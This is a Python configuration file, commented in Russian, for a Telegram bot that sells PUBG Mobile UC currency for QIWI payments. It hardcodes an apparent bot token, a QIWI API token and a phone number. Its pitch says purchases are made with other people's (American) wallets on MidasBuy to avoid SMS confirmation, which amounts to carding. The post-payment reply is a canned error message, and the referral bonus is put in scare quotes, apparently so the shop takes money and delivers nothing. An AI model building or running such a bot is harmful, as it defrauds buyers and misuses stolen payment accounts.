import telebot



#НЕ  ТРОГАЙТЕ ТО ЧТО НЕ ЗНАЕТЕ ! ! !


#Главное 

bot=telebot.TeleBot('1548575264:AAGxLpvui7_X5yHJXqJlA_GihTCFfHldMKc')#токен вашего бота
idadmin = 1498873332  # id админа бота ( можете взять в @userinfobot е)
qiwinumber = +79851647182    # номер киви на который будете прнимать деньги
token_qiwi='76fd932e9a688cd477078390bc9f8cad' #токен киви 
bot_name='pubgcucbot'#имя вашего бота



#кнопки
btnkupit="🛍 Купить"
btnotzyvy="💬 Отзывы"
btnprobota = "📝 Про бота"
btntexpoderjka = "⚙️ Тех. Поддержка"
btnotmena = "❌ Отмена"
btnceny = "📙 Цены"
btnref = "🎉 Реф. система"


#цена
cena = 200 #цена за 1000uc в рублях
bonusuc = 50 #сколько uc "получат" за каждого реферала


#Ответы бота
privet = "💁🏻‍♀️ Привет!\n\nРады тебя видеть в нашем магазине! У нас вы можете купить UC для PUBG Mobile по очень низким ценам.\n\n🦄 Если не появились вспомогательные кнопки, введите /start"
kupit = "Введите ваш ID в игре"
otzyvy = "Отзывы о нашем боте можете прочитать тут @pubg_otzyv"
probota = "♻️ Почему у нас так дешёво?\n\nВсе покупки делаются с чужих(американских) кошелков.\nПокупка делается на сайте MidasBuy\nДело в том что на этом сайте не нужно смс подтверждение для оплаты заказа.\n\nДля вас это 100% безопасно,вся ответственность на нас, считайте это как донат от нас🎁"
texpoderjka = "Связь с нами: @PubgUC_support"
otvet_ceny ="У нас самые низкие цены !\n\n200₽ за каждые 1000uc\n\nПри заказе от 10,000 uc вы получите +10% в подарок"
otvet_otmena = "Заказ отменен"
nepravilni_id = "Неправильный ID,Введите еще раз."

skolkouc="Сколько UC хотите купить?"




#покупка

minuc = 500 #минимальное количество uc которую могут купить
maxuc = 25000 #максимальное количество uc которую могут купить

errorminuc = "Минимальное количество для заказа - " + str(minuc) + "uc"  #ошибка когда хотят купить меньше минимального
errormaxuc = "Максимальное количество для заказа - " + str(maxuc) + "uc"   #больше



#ошибка


oshibkasumm = "Введите число от " + str(minuc) +" до " + str(maxuc)   #ошибка если при на вопрос сколько uc хотите купить  отправлят текст,не целое число,смайлы и т,д,

neoplatil = "Вы не оплатили заказ !\nОплатите заказ после этого нажмите \"Проверить оплату\""
oplatil = "Произошла ошибка ...\nСвяжтесь с Тех Поддержкой для решения проблемы"



